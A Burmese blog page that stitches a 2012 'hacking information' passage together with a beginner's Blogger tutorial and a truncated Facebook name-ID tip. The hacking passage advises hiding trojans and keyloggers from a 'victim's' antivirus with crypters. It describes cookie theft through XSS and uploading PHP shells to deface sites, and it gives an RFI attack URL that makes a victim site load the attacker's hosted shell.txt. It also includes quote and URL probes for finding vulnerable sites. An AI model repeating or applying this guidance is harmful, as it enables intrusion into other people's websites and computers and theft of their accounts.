အကြံပြုချက် - ကျနော်အကြံပေးလိုတာကတော့ "crypters" လို့ခေါ်တဲ့ program တွေကို အသုံးပြုဖို့ပါပဲ။ ၄င်းတို့က သင့်ရဲ့ server တွေကို ရှာဖွေမတွေ့ပဲ ပြုလုပ်နိုင်စေဖို့ကူညီပေးပါလိမ့်မယ်။ ဒါဆိုရင် သင့်သားကောင်ရဲ့ anti-virus တွေက ၄င်းတို့ကို detect မလုပ်နိုင်တော့ပါဘူး။ Anti-Virus နဲ့ တူတူပုန်းတမ်းကစားကြမယ် ဆိုတဲ့ post မှာ Crypter တွေကို တင်ပေးထားခဲ့ပြီး ဖြစ်ပါတယ်။

(ဃ) Trojans
Trojan တွေကတော့ keyloggerတွေရဲ့ ဖခင် နဲ့တူပါတယ်။ Trojan တွေက အပေါ်မှာ ဖော်ပြခဲ့တဲ့ keylogger တွေအတိုင်းပဲ သင့်ဆီကို keylog တွေ ပေးပို့ပါတယ်။ ဒါ့အပြင် ၄င်းတို့က သင့်သားကောင်းရဲ့ computer ကို သင် ထိန်းချုပ်မှု ရစေပါတယ်။ သင့်သားကောင်ရဲ့ computer မှာ သင့်စိတ်ကြိုက် fileတွေကို Edit / delete/ upload/ download လုပ်နိုင်ပါတယ်။ Trojan တွေမှာ keyboard ကို ကောင်းကောင်း အလုပ်မလုပ်အောင် ( keyboard မှာ ကိုယ်နှိပ်လိုက်တဲ့ စာလုံးက တစ်ခု ပေါ်နေတာက တစ်ခု ပေါ်ချင်တဲ့ စာလုံးလျှောက်ပေါ်နေတာ၊ တခါတလေ keys တွေကို ရိုက်လို့ရတဲ့ အခါ ရတယ် မရတဲ့ အခါလည်း မရဘူး အဲလိုမျိုးတွေပေါ့ )၊ CD ROM တွေ Eject လုပ်တဲ့ အခါ ထွက်မလာတာ ၊ CD ပြန်ထည့်ပေးဖို့အတွက် တောင်းဆိုတာ စသဖြင့် အခြား အခြားသော feature တွေလည်း ပါဝင်ပါသေးတယ်။ ( Trojan Toolများ )

အားနည်းချက် :
keylogger တွေနဲ့ အတူတူပါပဲ။

အကြံပြုချက် - keylogger မှာ အကြုံပြုခဲ့သလိုပါပဲ crypter တွေသုံးပါ။

Web Hacking

ကျနော်က ဘယ် website မဆို hack ဖို့အတွက် hacker တွေကို အကူအညီပေးနိုင်တဲ့ အသုံးပြုမှုအများဆုံးဖြစ်တဲ့ web hacking နည်းပညာ အချို့ ကို ဆွေးနွေးပေးသွားပါမယ်။ တဘက်ကကြည့်ရင်လည်း ဒါဟာ သင် site ကို ကာကွယ်ဖို့အတွက် ကူညီပါလိမ့်မယ်။
(က)SQL Injection
( ခ ) XSS
( ဂ) Shells
(ဃ) RFI
( င ) နောက်ထပ်အများကြီး ရှိပါသေးတယ်။ ဒါပေမယ့် ဒီမှာတော့ အသုံးပြုမှုအများဆုံးဖြစ်တာကိုပဲ ဆွေးနွေးသွားမှာ ဖြစ်ပါတယ်။

(က) SQL Injection
ယနေ့အချိန်အခါမှာ website အများစုဟာ SQL Database တစ်ခုနဲ့ connect လုပ်ထားကြပါတယ်။ SQL Databaseက သူတို့ရဲ့ website သို့ လာရောက်လာပတ်သူက register လုပ်သွားတဲ့အခါ username နဲ့ password တွေ ( encrypt လုပ်ပြီး )ကို သိမ်းဆည်းထားဖို့အတွက် သူတို့ကို ကူညီပါတယ်။ SQL database က user တစ်ယောက် logs in လုပ်တဲ့ အခါတိုင်းမှာ မေးခွန်းတွေမေးမြန်းတဲ့ အလုပ်ငန်းစဉ်ကို လုပ်ဆောင်ပါတယ်။ ၄င်းတို့ database ဆီသွားပြီး မှန်ကန်သေချာတဲ့ password ဟုတ်မဟုတ် ကြည့်ပါတယ်။ အကယ်၍ မှန်ကန်တယ်ဆိုရင်တော့ user ကို log in လိုက်ပါတယ်၊ မမှန်ဘူးဆိုရင်တော့ error တစ်ခုကို ပေးပါလိမ့်မယ်။ ဒါကြောင့် အခြေခံဆောင်ရွက်ချက်ကတော့ database မှာရှိတဲ့ internet information ကို အသုံးချဖို့ကြိုးစားပြီး database ထဲမှာရှိတဲ့ database ထဲမှာ မေးခွန်းတစ်ခုကို စစ်ဆေးဖို့ command တစ်ခုကို လိုက်နာဆောင်ရွက်နေခြင်းဖြစ်ပါတယ်။ ဒီနည်းလမ်းနဲ့ ပတ်သတ်ပြီး ဒီ post ထဲမှာ ထည့်သွင့်ဖို့ဆိုတာ တကယ့်ကို မဖြစ်နိုင်ပါဘူး။ ဘာကြောင့်လဲဆိုတော့ ဒီနည်းလမ်းဟာ website ကို hack ဖို့အတွက် နည်းလမ်းတွေထဲမှာ အရှုပ်ထွေး အခက်ခဲဆုံးနည်းလမ်းတစ်ခု ဖြစ်လို့ပါ။

သင့်ရဲ့ website မှာ RFI attach လုပ်ဖို့ အားနည်းချက်ရှိလား မရှိလားဆိုတာကို သိချင်ရင် အောက်ပါအတိုင်းပြုလုပ်ပါ...
အကယ်၍ သင့် site ရဲ့ URL က....

    yoursite.com/index.php?id=545

ဖြစ်နေတယ်ဆိုရင် ၄င်းရဲ့ အဆုံးမှာ ( ' ) ကို အောက်မှာ ပြထားသလိုမျိုး ပေါင်းထည့်ပေးပါ...

    yoursite.com/index.php?id=545'

( ခ ) XSS
XSS ကတော့ အချို့ website တွေကို hack ဖို့အတွက် ကောင်းမွန်တဲ့ အခြားနည်းလမ်းတစ်ခုလို့ ဆိုနိုင်ပါတယ်။ အချို့ website/ forum တွေက post ( သို့ ) ဆောင်းပါး တွေထဲမှာ HTML ခွင့်ပြုခဲ့မယ်ဆိုရင် hacker က content ထဲကို အန္တရာယ်ရှိတဲ့ script တွေကို post လုပ်နိုင်ပါတယ်။ ဒါကြောင့် ဘယ်အချိန်မဆို user တစ်ယောက်က page ကိုဖွင့်လိုက်တိုင်း cookieတွေက hacker ဆီကိုပေးပို့ပါလိမ့်မယ်။ ဒီအတွက် သူက user ကဲ့သို့ log in လုပ်နိုင်ပြီး website ကို #$%@# လုပ်ပါတော့တယ်။

( ဂ ) Shells
Shell ဆိုတာကတော့ အန္တရာယ်ရှိတဲ့ .php script ဖြစ်ပါတယ်။ ၄င်းကိုဘယ်လိုလုပ်ရမလဲ ဆိုတော့avaters, recepie, tricks , feedbacks ကဲ့သို့သော ဘယ်ဖိုင်မဆို upload လုပ်နိုင်တဲ့ website တစ်ခုခုမှာ နေရာ တစ်ခု ရှာပါ။ ပြီးရင် သင့်ရဲ့ shell file ကို အဲဒီထဲကို upload လုပ်နိုင်ဖို့ကြိုးစားပါ။ upload ပြီးသွားရင် ၄င်းကို URL bar မှာဖွင့်ပါ။ အဲဒီ webhosting ရဲ့ FTP account တစ်ခုလုံးကို သင် မြင်ရပါလိမ့်မယ်။ index page ထဲမှာပါဝင်သမျှကို သင့်စိတ်ကြိုက် rename/Edit/upload/download ကြိုက်သလိုလုပ်လို့ရပါပြီ။ အခုလိုပြုလုပ်ခြင်းကို deface လို့လည်း ခေါ်ပါတယ်။

(ဃ) RFI
RFI ကလည်း website တစ်ခုကို deface လုပ်ဖို့အတွက် ကောင်းတဲ့နည်းလမ်းတစ်ခုပဲ ဖြစ်ပါတယ်။ ၄င်းကို shell နဲ့အတူအသုံးပြုရမှာ ဖြစ်ပါတယ်။ ၄င်းကို သင့်ရဲ့ shell ပေါ်မှာ upload လုပ်ပြီးပြီး ဆိုရင် သင့်ကိုအထောက်အကူပေးပါလိမ့်မယ်...

    yoursite.com/shell.txt

သင်က RFT သို့ အားနည်းချက်ရှိတဲ့ site တစ်ခုကို ရှာတွေ့ရပါမယ်... အဲဒီနောက် အောက်မှာပြထားတဲ့ အတိုင်း ပြုလုပ်နိုင်ပါတယ်...

    victimssite.com/index.php?page=yousite.com/shell.txt

ဒီဟာက သင့်ကို သင့်သားကောင်ရဲ့ sites FTP ၀င်လမ်း ကို ထပ်ပေးပါလိမ့်မယ်။ shell မှာလိုပဲ သင်ကြိုက်သလို သင့်စိတ်ကြိုက် လုပ်လို့ရပါပြီ။
အကယ်၍ သင်က သင့် website က RFI attach လုပ်ဖို့ အားနည်းချက် ရှိလား မရှိဘူးလားဆိုတာကို စစ်ဆေးချင်ရင် အောက်ပါအတိုင်း လုပ်ပါ...
အကယ်၍ သင့် site ရဲ့ URL က

    yoursite.com/index.php?id=545

ဖြစ်နေခဲ့ရင် ၄င်းရဲ့ အဆုံးမှာ အောက်မှာပြထားတဲ့ အတိုင်း ပေါင်းထည့်ပေးပါ...

    yoursite.com/index.php?id=http://www.google.com

အကယ်၍ သင့် page ထဲမှာ google page ပါဝင်နေမယ်ဆိုရင်တော့ အဲဒီအဓိပ္ပာယ်က RFI သို့ တွဲဆက်ခြင်းမှာ ပျော့ကွက်တစ်ခုဖြစ်ပါတယ်။

Source- http://naytar.blogspot.com/2012/05/hacking-information.html

Blogရေးနည်း



Blog ရေးနည်း အခြေခံ
 April12/4/2017




ဒီအကြောင်းကို သိပြီးသား သူများက မဖတ်ချင်သည်များကို ကျော်သွားလို့ရပါတယ်။ ဘာလို့လဲဆိုတော့ လုံးဝ မသိသေးသူများကိုသာ ရည်ရွယ်ပြီးရေးသားထားခြင်းဖြစ်ပါတယ်။ မြန်မာနိုင်ငံမှာ အခုဆို Blogger တွေ တော်တော်လေး များလာပါပြီ ။ ကျွန်တော် အပါအ၀င်ပေါ့နော်။ အဲလို အများကြီးထဲမှာ အခုမှ စပြီး လုပ်ချင်တဲ့ သူများလည်း ပါဝင်ပါတယ်။ သိရင်တော့ အရမ်းလွယ်တဲ့ ကိစ္စတစ်ခုဖြစ်ပေမယ့် မသိသေးသူများအတွက်ကတော့ အခုထိ ခက်ခဲနေတဲ့ ကိစ္စဖြစ်နေဆဲပါ။ အဲဒါကြောင့် ဒီ စာကိုရေးဖြစ်သွားတာပါ။

Blog လုပ်နည်း

အဆင့်(၁)

Gmail Account မရှိသေးသူများက Account တစ်ခု အရင်လုပ်ထားပါ။ ပြီးလျှင် http://blogger.com/ သို့သွားပါ။  မိမိ မှာ ရှိပြီးသား Gamil Account နဲ့ Sign in ၀င်လိုက်ပါ။



အဆင့်(၂)

Create a limited Blogger Profile ကို နှိပ်ပါ။




အဆင့်(၃)

Display name မှာ မိမိ စိတ်ကြိုက် နာမည်တစ်ခုရိုက်ထည့်ပေးပါ။ ပြီးလျှင် Continute to Blogger ကိုနှိပ်ပါ။



အဆင့်(၄)

ပြီးရင်အောက်က New Blog ကိုနှိပ်လိုက်ပါ။



အဆင့်(၅)


(1)  မိမိ စိတ်ကြိုက်နာမည်တစ်ခုပေးလိုက်ပါ။ နာမည်တူရှိနေလျှင် Error Box တက်လာပါလိမ့်မည်။ နောက်နာမည်တစ်ခုပြောင်းပေးပါ။ သူက Blog Title အဖြစ်ပေါ်လာမှာဖြစ်ပါတယ်။
(2)   ဒါလည်း မိမိ စိတ်ကြိုက်ပေးလို့ရပါတယ်။ ရှိပြီးသားနာမည်တော့မရပါဘူး။ သူက Example : http://မိမိပေးလိုက်သည့်နာမည်.blogspot.com/ လို့ ပေါ်လာမှာဖြစ်ပါတယ်။
(3)  မိမိ စိတ်ကြိုက် Template တစ်ခုကို ရွေးပေးပါ။ သူမှာပါသမျှ မိမိ စိတ်ကြိုက်ရွေးလို့ရပါတယ်။ နောက်ပိုင်းမှ မိမိစိတ်ကြိုက် Template ချိန်းနည်းကိုတင်ပေးပါမည်။
(4)  အားလုံးပြီးသွားရင်တော့ Create Blog ကိုနှိပ်ပါ။




အဆင့်(၆)

ဒီအဆင့်ကိုရောက်ရင်တော့ မိတ်ဆွေမှာ ကိုယ်ပိုင် Blog တစ်ခု ပိုင်ဆိုင်သွားပါပြီ။ မိမိစိတ်ကြိုက် Post များကို မိမိ Blog တွင် စိတ်ကြိုက်ဖော်ပြခွင့်ရသွားပြီဖြစ်ပါတယ်။


  1. အဆင်ပြေကြပါစေ…။

Facebook Name IDတင်နည်း

❀ မင်္ဂလာပါ  ❀  #Name ID တင်နည်း​လေးပါ မိမိ acc တရားဝင်​ဖြစ်​တာ​ပေါ့ မကြာဘူးတစ်ရက်​ပဲ တစ်​ခါတစ်​ခါ ၁၀မိနစ်​ / ၆ နာရီနဲ့ရတယ်​ Account...